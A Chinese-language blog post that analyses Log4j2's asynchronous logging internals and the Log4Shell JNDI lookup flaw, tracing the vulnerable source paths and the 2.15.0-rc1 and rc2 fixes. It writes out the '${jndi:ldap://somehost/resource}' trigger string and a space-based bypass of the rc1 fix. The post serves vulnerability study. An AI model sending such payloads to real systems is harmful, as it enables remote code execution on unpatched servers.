Log4j2异步日志Disruptor及lookups远程执行漏洞详解

最新推荐文章于 2024-05-24 19:32:52 发布
最新推荐文章于 2024-05-24 19:32:52 发布
阅读量2.8k 收藏
点赞数
分类专栏: 笔记 文章标签: 安全 log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laim3/article/details/121914235
版权
Log4j2异步日志核心流程和涉及的组件

在这里插入图片描述
[基于log4j 2.x版本]

两个主要组件Logger、Appender,分别对应配置文件中的两个配置项

<Appenders></Appenders>
<Loggers></Loggers>

开启全局异步,log4j2.component.properties文件中添加属性.

Log4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector

开启异步后Logger会使用异步日志,即图中AsyncLoggerDisruptor(依赖lmax.Disruptor的无锁设计实现高性能)实现异步Logger.

Appender组件默认均为异步,即图中AsyncAppender(初始化长度默认为1024的BlockingQueue),AsyncThread是真正消费日志事件写入文件或者其他Appender的处理线程.

[如下源码分析中增加注释]

lookups漏洞

log.info("${jndi:ldap://somehost/resource}");
日志中包含此种格式信息可触发此漏洞,结合JDNI注入,攻击者可执行任意代码

org.apache.logging.log4j.core.appender.AsyncAppender.AsyncThread

        /**
         * 调用Appender
         * Calls {@link AppenderControl#callAppender(LogEvent) callAppender} on all registered 
         */
        boolean callAppenders(final LogEvent event) {
            boolean success = false;
            //循环调用配置的多个Appender
            for (final AppenderControl control : appenders) {
                try {
                    control.callAppender(event);
                    success = true;
                } catch (final Exception ex) {
                    // If no appender is successful the error appender will get it.
                }
            }
            return success;
        }

org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender#directEncodeEvent

    protected void directEncodeEvent(final LogEvent event) {
    	//根据配置格式输出进行编码,并根据配置执行lookup流程
        getLayout().encode(event, manager);
        if (this.immediateFlush || event.isEndOfBatch()) {
            manager.flush();
        }
    }

转换为文本org.apache.logging.log4j.core.layout.PatternLayout#toText

    /**
     * 转换LogEvent为String
     */
    private StringBuilder toText(final Serializer2 serializer, final LogEvent event,
            final StringBuilder destination) {
        return serializer.toSerializable(event, destination);
    }

    private static class PatternSerializer implements Serializer, Serializer2 {
        @Override
        public StringBuilder toSerializable(final LogEvent event, final StringBuilder buffer) {
            final int len = formatters.length;
            //格式化参数,log4j  <= 2.14.0版本默认转换器为MessagePatternConverter
            //log4j2 2.15.0版本为SimpleMessagePatternConverter
            for (int i = 0; i < len; i++) {
                formatters[i].format(event, buffer);
            }
            if (replace != null) { // creates temporary objects
                String str = buffer.toString();
                str = replace.format(str);
                buffer.setLength(0);
                buffer.append(str);
            }
            return buffer;
        }
    }

先看log4j < 2.15.0版本,
org.apache.logging.log4j.core.pattern.MessagePatternConverter#format


    /**
     * 属性取值为系统变量log4j2.formatMsgNoLookups
     */
    private final boolean noLookups;
    
    /**
     * {@inheritDoc}
     */
    @Override
    public void format(final LogEvent event, final StringBuilder toAppendTo) {
        final Message msg = event.getMessage();
        if (msg instanceof StringBuilderFormattable) {

            final boolean doRender = textRenderer != null;
            final StringBuilder workingBuilder = doRender ? new StringBuilder(80) : toAppendTo;

            final int offset = workingBuilder.length();
            if (msg instanceof MultiFormatStringBuilderFormattable) {
                ((MultiFormatStringBuilderFormattable) msg).formatTo(formats, workingBuilder);
            } else {
                ((StringBuilderFormattable) msg).formatTo(workingBuilder);
            }

            //是否执行lookup,noLookups属性默认值为系统变量log4j2.formatMsgNoLookups
            if (config != null && !noLookups) {
                for (int i = offset; i < workingBuilder.length() - 1; i++) {
                    if (workingBuilder.charAt(i) == '$' && workingBuilder.charAt(i + 1) == '{') {
                        final String value = workingBuilder.substring(offset, workingBuilder.length());
                        workingBuilder.setLength(offset);
                        workingBuilder.append(config.getStrSubstitutor().replace(event, value));
                    }
                }
            }
            if (doRender) {
                textRenderer.render(workingBuilder, toAppendTo);
            }
            return;
        }
        if (msg != null) {
            String result;
            if (msg instanceof MultiformatMessage) {
                result = ((MultiformatMessage) msg).getFormattedMessage(formats);
            } else {
                result = msg.getFormattedMessage();
            }
            if (result != null) {
                toAppendTo.append(config != null && result.contains("${")
                        ? config.getStrSubstitutor().replace(event, result) : result);
            } else {
                toAppendTo.append("null");
            }
        }
    }
	
    /**
     * 解析替换变量
     */
    protected boolean substitute(final LogEvent event, final StringBuilder buf, final int offset, final int length) {
        return substitute(event, buf, offset, length, null) > 0;
    }
	
    /**
     * 解析${}变量
     */
    protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf,
                                     final int startPos, final int endPos) {
        final StrLookup resolver = getVariableResolver();
        if (resolver == null) {
            return null;
        }
        return resolver.lookup(event, variableName);
    }
	
    /**
     * Looks up a named object through this JNDI context.
     *
     */
    public <T> T lookup(final String name) throws NamingException {
        //执行JNDI
        return (T) this.context.lookup(name);
    }

log4j2 2.15.0-rc1版本的修复
org.apache.logging.log4j.core.layout.PatternLayout.SerializerBuilder#build
创建MessagePatternConverter的代码:

public static MessagePatternConverter newInstance(final Configuration config, final String[] options) {
        boolean lookups = loadLookups(options);
        String[] formats = withoutLookupOptions(options);
        TextRenderer textRenderer = loadMessageRenderer(formats);
        MessagePatternConverter result = formats == null || formats.length == 0
                ? SimpleMessagePatternConverter.INSTANCE
                : new FormattedMessagePatternConverter(formats);
        if (lookups && config != null) {
            result = new LookupMessagePatternConverter(result, config);
        }
        if (textRenderer != null) {
            result = new RenderingPatternConverter(result, textRenderer);
        }
        return result;
    }

默认创建SimpleMessagePatternConverter,此转换器默认不会执行lookup
如果需要开启lookup,需要patternLayout属性值{lookups}

<property name="patternLayout">%m{lookups}%n</property>

2.15.0-rc1版本开启lookups后,则会创建LookupMessagePatternConverter,

private static final class LookupMessagePatternConverter extends MessagePatternConverter {

        @Override
        public void format(final LogEvent event, final StringBuilder toAppendTo) {
            int start = toAppendTo.length();
            delegate.format(event, toAppendTo);
            int indexOfSubstitution = toAppendTo.indexOf("${", start);
            if (indexOfSubstitution >= 0) {
                //执行lookup,与之前版本一致
                config.getStrSubstitutor()
                        .replaceIn(event, toAppendTo, indexOfSubstitution, toAppendTo.length() - indexOfSubstitution);
            }
        }
    }

JNDI默认协议只支持:java, ldap, ldaps 三种, 且只允许本地Hosts
rc1版本的修复存在的问题,是如果格式化参数存在空格,lookup仍然会被触发,如下

log.info("jndi:ldap://somehost/空格resource")

org.apache.logging.log4j.core.net.JndiManager#lookup

public synchronized <T> T lookup(final String name) throws NamingException {
        try {
            //如果uri中包含空格,new URI会抛格式异常,继续执行lookup
            URI uri = new URI(name);
            if (uri.getScheme() != null) {
                if (!allowedProtocols.contains(uri.getScheme().toLowerCase(Locale.ROOT))) {
                    LOGGER.warn("Log4j JNDI does not allow protocol {}", uri.getScheme());
                    return null;
                }
                //省略其他代码
                ......
            }
        } catch (URISyntaxException ex) {
            // This is OK.
        }
        return (T) this.context.lookup(name);
    }

2.15.0-rc2的修复版本的一处改动,URI格式错误后直接返回空,如下:

public synchronized <T> T lookup(final String name) throws NamingException {
        try {
            //如果uri中包含空格,new URI会抛格式异常,继续执行lookup
            URI uri = new URI(name);
            if (uri.getScheme() != null) {
                if (!allowedProtocols.contains(uri.getScheme().toLowerCase(Locale.ROOT))) {
                    LOGGER.warn("Log4j JNDI does not allow protocol {}", uri.getScheme());
                    return null;
                }
                //省略其他代码
                ......
            }
        } catch (URISyntaxException ex) {
            LOGGER.warn("Invalid JNDI URI - {}", name);
            return null;
        }
        return (T) this.context.lookup(name);
    }
laimGong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j mysql 异步_log4j2 异步打印日志 保存不到数据库里面
weixin_42512841的博客
02-07 291
之前能打印日志并且输出到数据库的 我改成全局异步处理。发现只是输出到控制台,数据库并没有保存,这是为什么呢?这是log4j.xml<Appenders><!-- 优先级从高到低分别是 OFF、FATAL、ERROR、WARN、INFO、DEBUG、ALL --><!-- 单词解释: Match:匹配 DENY:拒绝 Mismatch:不匹配 ACCEPT:接受 --&...
Log4j2日志框架到Disruptor入门
岁月不曾忘怀
09-26 1002
Disruptor是个啥相信听过的人不在少数,它是log4j2能提供高性能异步日志输出的底层支持,本质上他就是个并发框架,能够在无锁的情况下实现网络的Queue并发操作 ---- 来之官网的解释。 作为一个开发者,并发中的线程、锁、Lock、synchronized、CAS是我常常听说的概念,并发的好处是提升性能,如何能提升性能,用通俗的话来说就是抢占利用CPU资源,让CPU不要闲着,那既然是多个线程抢占CPU那必然就引出各种竞争问题,有了竞争那就出现了锁。 ...
log4j未创建日志文件夹打印日志
恨_别离的博客
09-12 837
log
Log4j2 性能的提升——异步日志
最新发布
Mr-ZuoShisan
05-24 249
同步线程首先会从 logger.info 方法开始,将内部调用的所有方法按顺序全部执行完毕,最后输出日志信息之后,才会进行下异步操作。这样的缺点在于,如果程序中添加了大量的日志代码,会影响程序执行效率,毕竟每执行一次日志输出都要进行一系列的方法调用。在文章标题中,我们提到了异步这个词,这或许使我们想到了与之相对立的同步,那么同步和异步这两个词的区别是什么呢,下面我们来聊一下。上面我们提到了同步和异步两个词的概念,一个是顺序执行,一个是并行执行,下面我们来看一下同步日志异步日志
Log4j2基于Disruptor异步日志优化(部分源码学习)
wajueji的博客
11-26 1606
一、前言  最近遇到了个log4j2日志导致线程阻塞的问题(多亏了开发小哥日志打的多,不然就没有下面这一系列骚操作)。大致描述下当时的情况(内网限制,没法把现场东西拿出来,只能口述了):log4j2配置情况: 同时配置了3个RollingRandomAccessFile,分别针对SQL语句、INFO日志、ERROR日志,大致的配置如下:<RollingRandomAccessFile na...
Log4j2的性能为什么这么好?
weixin_30294295的博客
01-15 1103
正文开始: 一、logback和log4j2压测比较 1、logback压测数据logback压测数据,50个线程,500万条日志写入时间。 logback:messageSize = 5000000,threadSize = 50,costTime = 27383ms logback:messageSize = 5000000,threadSize = 50,costTime = 2...
Log4j2 LMAX disruptor
AhahaGe
11-20 361
LMAX disruptor exchanging data between concurrent threads the queuing of events between stages in the pipeline was dominating the costs. However it became evident that queues as a fundamental data structure are limited due to the conflation of design conce
log4j2的性能为什么这么好?都是因为disruptor
chuixue24的博客
10-30 669
一、logback和log4j2压测比较 1、logback压测数据 logback压测数据,50个线程,500万条日志写入时间。 logback:messageSize = 5000000,threadSize = 50,costTime = 27383ms logback:messageSize = 5000000,threadSize = 50,costTime = 26391ms logback:messageSize = 5000000,threadSize.
log4j2Disruptor
阿呆的专栏
02-22 6495
log4j2实现原理可查看:https://blog.csdn.net/u010597819/article/details/86646261 文章同样基于log4j-2.7版本,disruptor-3.3.6 相信看过log4j2的源码后大家应该明白为什么第二代日志性能会提升那么多,这其中最大的功臣莫过于Disruptor并发编程框架。下面我们就跟着log4j2来走进Disruptor这个神...
Log4j2异步日志效率测试源码
04-10
1. 配置文件(如log4j2.xml或log4j2.json):定义了Log4j2日志配置,包括日志级别、输出目的地、是否启用异步模式等。 2. 测试类(如Log4j2AsyncTest.java):包含了测试用例,用于对比Log4j2异步和同步日志的性能...
log4j2异步Logger(详解)
08-29
log4j2异步Logger详解 log4j2异步Logger是一种高效的日志记录方式,它可以提高日志记录的性能和吞吐量。下面,我们将详细介绍log4j2异步Logger的原理、优点、缺点和启用方法。 1. 异步Logger的意义 异步Logger的...
Log4j2学习用到的jar包及apache-log4j-2.19.0-bin.zip
11-22
分别有disruptor-3.3.4.jar(Log4j2异步日志的底层实现)、log4j-api-2.19.0.jar(log4j门面)、log4j-core-2.19.0.jar(log4j实现)、log4j-slf4j-impl-2.19.0.jar(SLF4J与Log4j绑定)、slf4j-api-1.7.30.jar(SLF...
log4j2 demo 性能测试
08-02
Log4j2异步日志采用了LMAX Disruptor队列数据结构,这是一种高性能的并发工具,可以有效地减少线程间的上下文切换,进一步提升了日志处理效率。 在"Log4j2测试"的示例中,我们可以看到如何设置和使用异步日志。...
Spring Boot Log4j2的配置使用详解
08-30
Spring Boot Log4j2 的配置使用详解 本文主要介绍了 Spring Boot 中 Log4j2 的配置使用详解,包括 Log4j2 的导入、配置文件的创建、 appenders 的配置等内容。 Log4j2 简介 Log4j2 是 Apache Log4j 的升级版本,...
Log4j2 全局异步
weixin_44204076的博客
06-25 365
Log4j2 全局异步 在原有日志配置的基础上添加一行代码即可。 1.需要在启动服务前配置 1.1配置的参数 System.setProperty("Log4j2.contextSelector", "org.apache.logging.log4j.core.async.AsyncLoggerContextSelector"); 2.启动服务后即可看到 如有不对,欢迎指正。 如有侵权,联系删除。 ...
log4j2异步Logger
和大黄的博客
05-26 6808
1 异步Logger的意义 之前的日志框架基本都实现了AsyncAppender,被证明对性能的提升作用非常明显。 在log4j2日志框架中,增加了对Logger的异步实现。那么这一步的解耦,意义何在呢? 如图,按我目前的理解:异步Logger是让业务逻辑把日志信息放入Disruptor队列后可以直接返回(无需等待“挂载的各个Appender”都取走数据) 优点:更高吞吐、
log4j异步mysql_log4j2 异步日志(二)-- 高性能队列 Disruptor 的实现
weixin_28700411的博客
01-19 444
4.1生产者4.1.1单生产者相对于多生产者模型而言,单生产者模型显然更为简单,我们来看看他是怎么实现的:// Disruptorpublic void publishEvent(final EventTranslatorOneArg eventTranslator, final A arg) {ringBuffer.publishEvent(eventTranslator, arg);}/...
Storm、Log4j2高性能之—Disruptor队列
AIzone的博客
02-16 1285
Storm、Log4j2高性能之—Disruptor队列 1. Disruptor简介 Disruptor(https://github.com/LMAX-Exchange/disruptor)是英国外汇交易公司LMAX开发的一个高性能队列,研发的初衷是解决内存队列的延迟问题(在性能测试中发现竟然与I/O操作处于同样的数量级)。基于Disruptor开发的系统单线程能支撑每秒600万订单,20...
Log4j2AsyncLogger做全局异步日志
Leon_Jinhai_Sun的博客
02-13 765
Log4j2AsyncLogger做全局异步日志
Could not create plugin of type class org.apache.logging.log4j.core.async.AsyncLoggerConfig$RootLogger for element AsyncRoot: java.lang.NoClassDefFoundError: com/lmax/disruptor/EventHandler java.lang.NoClassDefFoundError: com/lmax/disruptor/EventHandler
06-03
这个错误是因为 Log4j 2.x 使用了 LMAX Disruptor 库来提高日志系统的性能,但是该库未被正确加载。建议您检查您的项目中是否包含了正确版本的 disruptor 库,并且确保在运行时可以正确加载它。如果您使用的是 Maven,可以尝试在 pom.xml 文件中添加以下依赖项: ``` <dependency> <groupId>com.lmax</groupId> <artifactId>disruptor</artifactId> <version>3.3.6</version> </dependency> ``` 如果您使用的是 Gradle,可以尝试在 build.gradle 文件中添加以下依赖项: ``` compile group: 'com.lmax', name: 'disruptor', version: '3.3.6' ``` 如果您已经添加了正确的 disruptor 依赖项,但仍然遇到此错误,请确保您正在使用正确版本的 Log4j,并且您的项目配置正确。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值